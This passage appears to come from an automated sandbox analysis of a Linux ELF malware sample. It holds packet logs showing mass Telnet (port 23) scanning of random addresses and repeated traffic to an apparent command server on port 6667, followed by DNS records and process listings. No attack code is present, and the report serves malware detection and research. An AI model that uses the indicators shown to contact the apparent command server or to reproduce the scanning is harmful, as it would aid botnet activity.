              Mar 27, 2024 11:01:49.364999056 CET4802623192.168.2.1444.217.112.244
              Mar 27, 2024 11:01:49.365000963 CET4805423192.168.2.14124.149.220.93
              Mar 27, 2024 11:01:49.365004063 CET3430623192.168.2.1418.128.211.105
              Mar 27, 2024 11:01:49.365031004 CET6021623192.168.2.1499.72.69.227
              Mar 27, 2024 11:01:49.365036964 CET5097823192.168.2.14158.84.142.145
              Mar 27, 2024 11:01:49.365089893 CET3675623192.168.2.14166.68.64.40
              Mar 27, 2024 11:01:49.365089893 CET3344823192.168.2.14172.130.102.221
              Mar 27, 2024 11:01:49.365092039 CET5127623192.168.2.1451.207.169.20
              Mar 27, 2024 11:01:49.365106106 CET5300623192.168.2.14156.67.96.247
              Mar 27, 2024 11:01:49.365140915 CET5734223192.168.2.14162.76.47.221
              Mar 27, 2024 11:01:49.365151882 CET3433023192.168.2.1473.198.181.52
              Mar 27, 2024 11:01:49.365156889 CET3294423192.168.2.14187.71.63.110
              Mar 27, 2024 11:01:49.365190983 CET3709223192.168.2.14203.144.91.60
              Mar 27, 2024 11:01:49.365211964 CET5068823192.168.2.14135.158.70.166
              Mar 27, 2024 11:01:49.365216017 CET4160823192.168.2.1467.149.182.155
              Mar 27, 2024 11:01:49.365230083 CET4661823192.168.2.14107.23.208.50
              Mar 27, 2024 11:01:49.365246058 CET4895623192.168.2.14255.128.227.29
              Mar 27, 2024 11:01:49.365282059 CET3788223192.168.2.14218.157.254.111
              Mar 27, 2024 11:01:49.365298986 CET4279623192.168.2.141.180.39.221
              Mar 27, 2024 11:01:49.365309954 CET5174823192.168.2.1464.150.222.253
              Mar 27, 2024 11:01:49.365318060 CET3322023192.168.2.1434.51.194.220
              Mar 27, 2024 11:01:49.365348101 CET4352423192.168.2.14108.210.167.213
              Mar 27, 2024 11:01:49.365355968 CET3889823192.168.2.1479.149.44.78
              Mar 27, 2024 11:01:49.365389109 CET4741423192.168.2.14255.202.221.99
              Mar 27, 2024 11:01:49.365389109 CET4613023192.168.2.1490.64.2.136
              Mar 27, 2024 11:01:49.365406990 CET5575823192.168.2.14248.58.174.162
              Mar 27, 2024 11:01:49.365422010 CET3500023192.168.2.14133.67.47.81
              Mar 27, 2024 11:01:49.365441084 CET3543023192.168.2.14109.241.40.220
              Mar 27, 2024 11:01:49.365509033 CET4687823192.168.2.1434.122.178.70
              Mar 27, 2024 11:01:49.365545988 CET5299423192.168.2.14246.241.24.149
              Mar 27, 2024 11:01:49.366178989 CET5511423192.168.2.14187.187.0.190
              Mar 27, 2024 11:01:49.367165089 CET5875623192.168.2.14143.150.56.37
              Mar 27, 2024 11:01:49.367624998 CET5644823192.168.2.1496.155.142.240
              Mar 27, 2024 11:01:49.371603966 CET5004823192.168.2.14198.83.75.162
              Mar 27, 2024 11:01:49.374566078 CET4817223192.168.2.1487.249.45.25
              Mar 27, 2024 11:01:49.376461983 CET6089423192.168.2.1419.152.64.248
              Mar 27, 2024 11:01:49.381062984 CET5443023192.168.2.1486.70.45.242
              Mar 27, 2024 11:01:49.382458925 CET4619623192.168.2.1499.78.121.248
              Mar 27, 2024 11:01:49.382805109 CET5409423192.168.2.14243.35.32.155
              Mar 27, 2024 11:01:49.389249086 CET3654823192.168.2.14155.144.182.131
              Mar 27, 2024 11:01:49.389394999 CET4301823192.168.2.14216.220.142.177
              Mar 27, 2024 11:01:49.390650034 CET3854023192.168.2.14161.78.43.43
              Mar 27, 2024 11:01:49.390918970 CET5082423192.168.2.14146.68.120.22
              Mar 27, 2024 11:01:49.400249958 CET3476823192.168.2.14142.60.125.33
              Mar 27, 2024 11:01:49.405837059 CET4401423192.168.2.14101.76.210.230
              Mar 27, 2024 11:01:49.405966043 CET3319823192.168.2.1488.72.253.151
              Mar 27, 2024 11:01:49.407946110 CET4650823192.168.2.1477.15.36.139
              Mar 27, 2024 11:01:49.408737898 CET3372023192.168.2.1440.203.225.255
              Mar 27, 2024 11:01:49.409776926 CET3428623192.168.2.144.227.35.130
              Mar 27, 2024 11:01:49.410150051 CET5017223192.168.2.14123.203.44.111
              Mar 27, 2024 11:01:49.410507917 CET3668623192.168.2.14180.255.217.196
              Mar 27, 2024 11:01:49.411766052 CET5661423192.168.2.14140.212.144.53
              Mar 27, 2024 11:01:49.412236929 CET4294823192.168.2.14249.42.54.168
              Mar 27, 2024 11:01:49.415128946 CET5287023192.168.2.14151.91.72.161
              Mar 27, 2024 11:01:49.415364981 CET4278223192.168.2.1485.52.103.170
              Mar 27, 2024 11:01:49.416352987 CET5258023192.168.2.1497.86.239.227
              Mar 27, 2024 11:01:49.417042971 CET5011223192.168.2.14213.19.185.112
              Mar 27, 2024 11:01:49.419913054 CET4082823192.168.2.1474.93.76.108
              Mar 27, 2024 11:01:49.422772884 CET4087823192.168.2.14212.209.29.173
              Mar 27, 2024 11:01:49.423588991 CET3836223192.168.2.1472.198.216.52
              Mar 27, 2024 11:01:49.424233913 CET5089423192.168.2.14189.92.71.140
              Mar 27, 2024 11:01:49.426492929 CET5590423192.168.2.14114.230.239.130
              Mar 27, 2024 11:01:49.426898003 CET4693223192.168.2.14138.20.63.193
              Mar 27, 2024 11:01:49.427927017 CET4432023192.168.2.1499.96.39.51
              Mar 27, 2024 11:01:49.432626963 CET4437423192.168.2.1414.112.51.133
              Mar 27, 2024 11:01:49.434825897 CET4911823192.168.2.14172.202.18.120
              Mar 27, 2024 11:01:49.434839964 CET3379823192.168.2.1496.26.176.65
              Mar 27, 2024 11:01:49.436125994 CET4939423192.168.2.1477.78.156.73
              Mar 27, 2024 11:01:49.436959028 CET5286823192.168.2.14112.244.49.87
              Mar 27, 2024 11:01:49.437187910 CET3330023192.168.2.14144.19.152.185
              Mar 27, 2024 11:01:49.456574917 CET3724023192.168.2.14217.125.58.120
              Mar 27, 2024 11:01:49.463366985 CET2348594135.148.147.22192.168.2.14
              Mar 27, 2024 11:01:49.495851040 CET4852023192.168.2.14181.186.127.211
              Mar 27, 2024 11:01:49.535432100 CET233915478.198.105.255192.168.2.14
              Mar 27, 2024 11:01:49.548289061 CET233434062.28.65.195192.168.2.14
              Mar 27, 2024 11:01:49.581681013 CET5516023192.168.2.14222.70.53.11
              Mar 27, 2024 11:01:49.584279060 CET233947081.200.118.236192.168.2.14
              Mar 27, 2024 11:01:49.587306023 CET234817287.249.45.25192.168.2.14
              Mar 27, 2024 11:01:49.593854904 CET66747866139.59.88.74192.168.2.14
              Mar 27, 2024 11:01:49.593903065 CET47866667192.168.2.14139.59.88.74
              Mar 27, 2024 11:01:49.595230103 CET6080623192.168.2.14187.208.72.114
              Mar 27, 2024 11:01:49.600317955 CET235909080.240.52.153192.168.2.14
              Mar 27, 2024 11:01:49.601674080 CET66747866139.59.88.74192.168.2.14
              Mar 27, 2024 11:01:49.601720095 CET47866667192.168.2.14139.59.88.74
              Mar 27, 2024 11:01:49.605828047 CET2335092187.107.195.129192.168.2.14
              Mar 27, 2024 11:01:49.605885983 CET3509223192.168.2.14187.107.195.129
              Mar 27, 2024 11:01:49.613791943 CET3634023192.168.2.14158.191.55.217
              Mar 27, 2024 11:01:49.629575014 CET233405060.90.247.212192.168.2.14
              Mar 27, 2024 11:01:49.636744976 CET5735223192.168.2.1431.28.179.247
              Mar 27, 2024 11:01:49.639048100 CET5989023192.168.2.14129.183.17.86
              Mar 27, 2024 11:01:49.641098976 CET234939477.78.156.73192.168.2.14
              Mar 27, 2024 11:01:49.642380953 CET2346772118.61.56.165192.168.2.14
              Mar 27, 2024 11:01:49.662498951 CET3620623192.168.2.14240.120.232.98
              Mar 27, 2024 11:01:49.669480085 CET4033223192.168.2.14124.240.71.6
              Mar 27, 2024 11:01:49.698211908 CET4257223192.168.2.1479.71.123.105
              Mar 27, 2024 11:01:49.699697018 CET5419623192.168.2.1494.88.13.178
              Mar 27, 2024 11:01:49.702330112 CET5877423192.168.2.1423.153.3.147
              Mar 27, 2024 11:01:49.894431114 CET3509223192.168.2.14187.107.195.129
              Mar 27, 2024 11:01:49.955013037 CET66747866139.59.88.74192.168.2.14
              Mar 27, 2024 11:01:49.955066919 CET47866667192.168.2.14139.59.88.74
              Mar 27, 2024 11:01:49.963066101 CET66747866139.59.88.74192.168.2.14
              Mar 27, 2024 11:01:50.144165039 CET2335092187.107.195.129192.168.2.14
              Mar 27, 2024 11:01:50.178036928 CET2335092187.107.195.129192.168.2.14
              Mar 27, 2024 11:01:50.178117037 CET3509223192.168.2.14187.107.195.129
              Mar 27, 2024 11:01:50.388636112 CET2355784102.31.24.192192.168.2.14
              Mar 27, 2024 11:02:01.169037104 CET46540443192.168.2.14185.125.190.26
              Mar 27, 2024 11:02:31.631846905 CET46540443192.168.2.14185.125.190.26
              Mar 27, 2024 11:03:11.404516935 CET66747866139.59.88.74192.168.2.14
              Mar 27, 2024 11:03:11.404635906 CET47866667192.168.2.14139.59.88.74
              Mar 27, 2024 11:03:11.765670061 CET66747866139.59.88.74192.168.2.14
              Mar 27, 2024 11:03:11.765784025 CET47866667192.168.2.14139.59.88.74
              Mar 27, 2024 11:03:13.824863911 CET66747866139.59.88.74192.168.2.14
              Mar 27, 2024 11:03:13.824987888 CET47866667192.168.2.14139.59.88.74
              Mar 27, 2024 11:03:14.189753056 CET66747866139.59.88.74192.168.2.14
              Mar 27, 2024 11:03:14.189878941 CET47866667192.168.2.14139.59.88.74
              Mar 27, 2024 11:05:13.845776081 CET66747866139.59.88.74192.168.2.14
              Mar 27, 2024 11:05:13.846203089 CET47866667192.168.2.14139.59.88.74
              Mar 27, 2024 11:05:14.207365990 CET66747866139.59.88.74192.168.2.14
              Mar 27, 2024 11:05:14.207463980 CET47866667192.168.2.14139.59.88.74
              Mar 27, 2024 11:05:14.906423092 CET66747866139.59.88.74192.168.2.14
              Mar 27, 2024 11:05:14.906586885 CET47866667192.168.2.14139.59.88.74

              UDP Packets

              TimestampSource PortDest PortSource IPDest IP
              Mar 27, 2024 11:01:53.452799082 CET4831553192.168.2.141.1.1.1
              Mar 27, 2024 11:01:53.453672886 CET5785153192.168.2.141.1.1.1
              Mar 27, 2024 11:01:53.548764944 CET53578511.1.1.1192.168.2.14
              Mar 27, 2024 11:01:53.549150944 CET53483151.1.1.1192.168.2.14

              ICMP Packets

              TimestampSource IPDest IPChecksumCodeType
              Mar 27, 2024 11:01:49.470251083 CET100.8.82.61192.168.2.14761d(Unknown)Destination Unreachable
              Mar 27, 2024 11:01:49.512178898 CET75.70.97.79192.168.2.146c6d(Unknown)Destination Unreachable
              Mar 27, 2024 11:01:49.530092001 CET200.57.64.151192.168.2.14745e(Time to live exceeded in transit)Time Exceeded
              Mar 27, 2024 11:01:49.548329115 CET91.106.184.183192.168.2.143f85(Unknown)Destination Unreachable
              Mar 27, 2024 11:01:49.553147078 CET153.109.99.33192.168.2.14c053(Time to live exceeded in transit)Time Exceeded
              Mar 27, 2024 11:01:49.885571957 CET115.42.78.226192.168.2.14217b(Time to live exceeded in transit)Time Exceeded
              Mar 27, 2024 11:01:52.515878916 CET216.220.133.46192.168.2.142772(Host unreachable)Destination Unreachable
              Mar 27, 2024 11:01:52.572701931 CET73.137.254.222192.168.2.144c90(Host unreachable)Destination Unreachable
              Mar 27, 2024 11:01:52.660422087 CET14.52.28.160192.168.2.14eab7(Host unreachable)Destination Unreachable
              Mar 27, 2024 11:02:10.603770971 CET200.126.126.1192.168.2.14666(Host unreachable)Destination Unreachable

              DNS Queries

              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              Mar 27, 2024 11:01:53.452799082 CET192.168.2.141.1.1.10x4fcStandard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
              Mar 27, 2024 11:01:53.453672886 CET192.168.2.141.1.1.10x653aStandard query (0)daisy.ubuntu.com28IN (0x0001)false

              DNS Answers

              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              Mar 27, 2024 11:01:53.549150944 CET1.1.1.1192.168.2.140x4fcNo error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false
              Mar 27, 2024 11:01:53.549150944 CET1.1.1.1192.168.2.140x4fcNo error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false

              System Behavior

              General

              Start time (UTC):10:01:47
              Start date (UTC):27/03/2024
              Path:/tmp/rLMjh4RBTM.elf
              Arguments:/tmp/rLMjh4RBTM.elf
              File size:89720 bytes
              MD5 hash:db952fa7284ef69e5529d888ffb2c0a4

              Chronological Activities


              General

              Start time (UTC):10:01:47
              Start date (UTC):27/03/2024
              Path:/tmp/rLMjh4RBTM.elf
              Arguments:-
              File size:89720 bytes
              MD5 hash:db952fa7284ef69e5529d888ffb2c0a4

              Chronological Activities


              General

              Start time (UTC):10:01:47
              Start date (UTC):27/03/2024
              Path:/tmp/rLMjh4RBTM.elf
              Arguments:-
              File size:89720 bytes
              MD5 hash:db952fa7284ef69e5529d888ffb2c0a4

              Chronological Activities


              General

              Start time (UTC):10:01:48
              Start date (UTC):27/03/2024
              Path:/tmp/rLMjh4RBTM.elf
              Arguments:-
              File size:89720 bytes
              MD5 hash:db952fa7284ef69e5529d888ffb2c0a4

              Chronological Activities


              General

              Start time (UTC):10:01:50
              Start date (UTC):27/03/2024
              Path:/tmp/rLMjh4RBTM.elf
              Arguments:-
              File size:89720 bytes
              MD5 hash:db952fa7284ef69e5529d888ffb2c0a4

              General

              Start time (UTC):10:03:10
              Start date (UTC):27/03/2024
              Path:/tmp/rLMjh4RBTM.elf
              Arguments:-
              File size:89720 bytes
              MD5 hash:db952fa7284ef69e5529d888ffb2c0a4

              General

              Start time (UTC):10:03:12
              Start date (UTC):27/03/2024
              Path:/tmp/rLMjh4RBTM.elf
              Arguments:-
              File size:89720 bytes
              MD5 hash:db952fa7284ef69e5529d888ffb2c0a4

              General

              Start time (UTC):10:05:12
              Start date (UTC):27/03/2024
              Path:/tmp/rLMjh4RBTM.elf
              Arguments:-
              File size:89720 bytes
              MD5 hash:db952fa7284ef69e5529d888ffb2c0a4

              General

              Start time (UTC):10:01:47
              Start date (UTC):27/03/2024
              Path:/usr/libexec/gnome-session-binary
              Arguments:-
              File size:334664 bytes
              MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

              Chronological Activities


              General

              Start time (UTC):10:01:47
              Start date (UTC):27/03/2024
              Path:/bin/sh
              Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-sharing
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Chronological Activities


              General

              Start time (UTC):10:01:47
              Start date (UTC):27/03/2024
              Path:/usr/libexec/gsd-sharing
              Arguments:/usr/libexec/gsd-sharing
              File size:35424 bytes
              MD5 hash:e29d9025d98590fbb69f89fdbd4438b3

              Chronological Activities


              General

              Start time (UTC):10:01:47
              Start date (UTC):27/03/2024
              Path:/usr/libexec/gnome-session-binary
              Arguments:-
              File size:334664 bytes
              MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

              Chronological Activities


              General

              Start time (UTC):10:01:47
              Start date (UTC):27/03/2024
              Path:/bin/sh
              Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-wacom
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Chronological Activities


              General

              Start time (UTC):10:01:47
              Start date (UTC):27/03/2024
              Path:/usr/libexec/gsd-wacom
              Arguments:/usr/libexec/gsd-wacom
              File size:39520 bytes
              MD5 hash:13778dd1a23a4e94ddc17ac9caa4fcc1

              Chronological Activities


              General

              Start time (UTC):10:01:47
              Start date (UTC):27/03/2024
              Path:/usr/libexec/gnome-session-binary
              Arguments:-
              File size:334664 bytes
              MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

              Chronological Activities


              General

              Start time (UTC):10:01:47
              Start date (UTC):27/03/2024
              Path:/bin/sh
              Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-keyboard
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Chronological Activities


              General

              Start time (UTC):10:01:47
              Start date (UTC):27/03/2024
              Path:/usr/libexec/gsd-keyboard
              Arguments:/usr/libexec/gsd-keyboard
              File size:39760 bytes
              MD5 hash:8e288fd17c80bb0a1148b964b2ac2279

              Chronological Activities


              General

              Start time (UTC):10:01:47
              Start date (UTC):27/03/2024
              Path:/usr/libexec/gnome-session-binary
              Arguments:-
              File size:334664 bytes
              MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

              Chronological Activities


              General

              Start time (UTC):10:01:47
              Start date (UTC):27/03/2024
              Path:/bin/sh
              Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-print-notifications
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Chronological Activities


              General

              Start time (UTC):10:01:48
              Start date (UTC):27/03/2024
              Path:/usr/libexec/gsd-print-notifications
              Arguments:/usr/libexec/gsd-print-notifications
              File size:51840 bytes
              MD5 hash:71539698aa691718cee775d6b9450ae2

              Chronological Activities


              General

              Start time (UTC):10:01:48
              Start date (UTC):27/03/2024
              Path:/usr/lib/systemd/systemd
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Chronological Activities


              General

              Start time (UTC):10:01:48
              Start date (UTC):27/03/2024
              Path:/usr/lib/upower/upowerd
              Arguments:/usr/lib/upower/upowerd
              File size:260328 bytes
              MD5 hash:1253eea2fe5fe4017069664284e326cd

              Chronological Activities


              General

              Start time (UTC):10:01:47
              Start date (UTC):27/03/2024
              Path:/usr/libexec/gnome-session-binary
              Arguments:-
              File size:334664 bytes
              MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

              Chronological Activities


              General

              Start time (UTC):10:01:47
              Start date (UTC):27/03/2024
              Path:/bin/sh
              Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-rfkill
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Chronological Activities


              General

              Start time (UTC):10:01:48
              Start date (UTC):27/03/2024
              Path:/usr/libexec/gsd-rfkill
              Arguments:/usr/libexec/gsd-rfkill
              File size:51808 bytes
              MD5 hash:88a16a3c0aba1759358c06215ecfb5cc

              Chronological Activities


              General

              Start time (UTC):10:01:47
              Start date (UTC):27/03/2024
              Path:/usr/libexec/gvfsd-fuse
              Arguments:-
              File size:47632 bytes
              MD5 hash:d18fbf1cbf8eb57b17fac48b7b4be933

              Chronological Activities


              General

              Start time (UTC):10:01:47
              Start date (UTC):27/03/2024
              Path:/bin/fusermount
              Arguments:fusermount -u -q -z -- /run/user/1000/gvfs
              File size:39144 bytes
              MD5 hash:576a1b135c82bdcbc97a91acea900566

              Chronological Activities


              General

              Start time (UTC):10:01:48
              Start date (UTC):27/03/2024
              Path:/usr/libexec/gnome-session-binary
              Arguments:-
              File size:334664 bytes
              MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

              Chronological Activities


              General

              Start time (UTC):10:01:48
              Start date (UTC):27/03/2024
              Path:/bin/sh
              Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-smartcard
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Chronological Activities


              General

              Start time (UTC):10:01:48
              Start date (UTC):27/03/2024
              Path:/usr/libexec/gsd-smartcard
              Arguments:/usr/libexec/gsd-smartcard
              File size:109152 bytes
              MD5 hash:ea1fbd7f62e4cd0331eae2ef754ee605

              Chronological Activities


              General

              Start time (UTC):10:01:48
              Start date (UTC):27/03/2024
              Path:/usr/libexec/gnome-session-binary
              Arguments:-
              File size:334664 bytes
              MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

              Chronological Activities


              General

              Start time (UTC):10:01:48
              Start date (UTC):27/03/2024
              Path:/bin/sh
              Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-color
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Chronological Activities


              General

              Start time (UTC):10:01:48
              Start date (UTC):27/03/2024
              Path:/usr/libexec/gsd-color
              Arguments:/usr/libexec/gsd-color
              File size:92832 bytes
              MD5 hash:ac2861ad93ce047283e8e87cefef9a19

              Chronological Activities


              General

              Start time (UTC):10:01:48
              Start date (UTC):27/03/2024
              Path:/usr/libexec/gnome-session-binary
              Arguments:-
              File size:334664 bytes
              MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

              Chronological Activities


              General

              Start time (UTC):10:01:48
              Start date (UTC):27/03/2024
              Path:/bin/sh
              Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-datetime
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Chronological Activities


              General

              Start time (UTC):10:01:48
              Start date (UTC):27/03/2024
              Path:/usr/libexec/gsd-datetime
              Arguments:/usr/libexec/gsd-datetime
              File size:76736 bytes
              MD5 hash:d80d39745740de37d6634d36e344d4bc

              Chronological Activities


              General

              Start time (UTC):10:01:48
              Start date (UTC):27/03/2024
              Path:/usr/bin/xfce4-panel
              Arguments:-
              File size:375768 bytes
              MD5 hash:a15b657c7d54ac1385f1f15004ea6784

              Chronological Activities


              General

              Start time (UTC):10:01:48
              Start date (UTC):27/03/2024
              Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
              Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear"
              File size:35136 bytes
              MD5 hash:ac0b8a906f359a8ae102244738682e76

              Chronological Activities


              General

              Start time (UTC):10:01:48
              Start date (UTC):27/03/2024
              Path:/usr/libexec/gnome-session-binary
              Arguments:-
              File size:334664 bytes
              MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

              Chronological Activities


              General

              Start time (UTC):10:01:48
              Start date (UTC):27/03/2024
              Path:/bin/sh
              Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-media-keys
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Chronological Activities


              General

              Start time (UTC):10:01:48
              Start date (UTC):27/03/2024
              Path:/usr/libexec/gsd-media-keys
              Arguments:/usr/libexec/gsd-media-keys
              File size:232936 bytes
              MD5 hash:a425448c135afb4b8bfd79cc0b6b74da

              Chronological Activities


              General

              Start time (UTC):10:01:48
              Start date (UTC):27/03/2024
              Path:/usr/bin/xfce4-panel
              Arguments:-
              File size:375768 bytes
              MD5 hash:a15b657c7d54ac1385f1f15004ea6784

              Chronological Activities


              General

              Start time (UTC):10:01:48
              Start date (UTC):27/03/2024
              Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
              Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
              File size:35136 bytes
              MD5 hash:ac0b8a906f359a8ae102244738682e76

              Chronological Activities


              General

              Start time (UTC):10:01:48
              Start date (UTC):27/03/2024
              Path:/usr/libexec/gnome-session-binary
              Arguments:-
              File size:334664 bytes
              MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

              Chronological Activities


              General

              Start time (UTC):10:01:48
              Start date (UTC):27/03/2024
              Path:/bin/sh
              Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-screensaver-proxy
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Chronological Activities


              General

              Start time (UTC):10:01:48
              Start date (UTC):27/03/2024
              Path:/usr/libexec/gsd-screensaver-proxy
              Arguments:/usr/libexec/gsd-screensaver-proxy
              File size:27232 bytes
              MD5 hash:77e309450c87dceee43f1a9e50cc0d02

              Chronological Activities


              General

              Start time (UTC):10:01:48
              Start date (UTC):27/03/2024
              Path:/usr/bin/xfce4-panel
              Arguments:-
              File size:375768 bytes
              MD5 hash:a15b657c7d54ac1385f1f15004ea6784

              Chronological Activities


              General

              Start time (UTC):10:01:48
              Start date (UTC):27/03/2024
              Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
              Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
              File size:35136 bytes
              MD5 hash:ac0b8a906f359a8ae102244738682e76

              Chronological Activities


              General

              Start time (UTC):10:01:48
              Start date (UTC):27/03/2024
              Path:/usr/libexec/gnome-session-binary
              Arguments:-
              File size:334664 bytes
              MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

              Chronological Activities


              General

              Start time (UTC):10:01:48
              Start date (UTC):27/03/2024
              Path:/bin/sh
              Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-a11y-settings
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Chronological Activities


              General

              Start time (UTC):10:01:49
              Start date (UTC):27/03/2024
              Path:/usr/libexec/gsd-a11y-settings
              Arguments:/usr/libexec/gsd-a11y-settings
              File size:23056 bytes
              MD5 hash:18e243d2cf30ecee7ea89d1462725c5c

              Chronological Activities


              General

              Start time (UTC):10:01:48
              Start date (UTC):27/03/2024
              Path:/usr/bin/xfce4-panel
              Arguments:-
              File size:375768 bytes
              MD5 hash:a15b657c7d54ac1385f1f15004ea6784

              Chronological Activities


              General

              Start time (UTC):10:01:48
              Start date (UTC):27/03/2024
              Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
              Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display"
              File size:35136 bytes
              MD5 hash:ac0b8a906f359a8ae102244738682e76

              Chronological Activities


              General

              Start time (UTC):10:01:48
              Start date (UTC):27/03/2024
              Path:/usr/libexec/gnome-session-binary
              Arguments:-
              File size:334664 bytes
              MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

              Chronological Activities


              General

              Start time (UTC):10:01:48
              Start date (UTC):27/03/2024
              Path:/bin/sh
              Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-sound
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Chronological Activities


              General

              Start time (UTC):10:01:49
              Start date (UTC):27/03/2024
              Path:/usr/libexec/gsd-sound
              Arguments:/usr/libexec/gsd-sound
              File size:31248 bytes
              MD5 hash:4c7d3fb993463337b4a0eb5c80c760ee

              Chronological Activities


              General

              Start time (UTC):10:01:48
              Start date (UTC):27/03/2024
              Path:/usr/bin/xfce4-panel
              Arguments:-
              File size:375768 bytes
              MD5 hash:a15b657c7d54ac1385f1f15004ea6784

              Chronological Activities


              General

              Start time (UTC):10:01:48
              Start date (UTC):27/03/2024
              Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
              Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
              File size:35136 bytes
              MD5 hash:ac0b8a906f359a8ae102244738682e76

              Chronological Activities


              General

              Start time (UTC):10:01:48
              Start date (UTC):27/03/2024
              Path:/usr/libexec/gnome-session-binary
              Arguments:-
              File size:334664 bytes
              MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

              Chronological Activities


              General

              Start time (UTC):10:01:48
              Start date (UTC):27/03/2024
              Path:/bin/sh
              Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Chronological Activities


              General

              Start time (UTC):10:01:49
              Start date (UTC):27/03/2024
              Path:/usr/libexec/gsd-housekeeping
              Arguments:/usr/libexec/gsd-housekeeping
              File size:51840 bytes
              MD5 hash:b55f3394a84976ddb92a2915e5d76914

              Chronological Activities


              General

              Start time (UTC):10:01:49
              Start date (UTC):27/03/2024
              Path:/usr/libexec/gnome-session-binary
              Arguments:-
              File size:334664 bytes
              MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

              Chronological Activities


              General

              Start time (UTC):10:01:49
              Start date (UTC):27/03/2024
              Path:/bin/sh
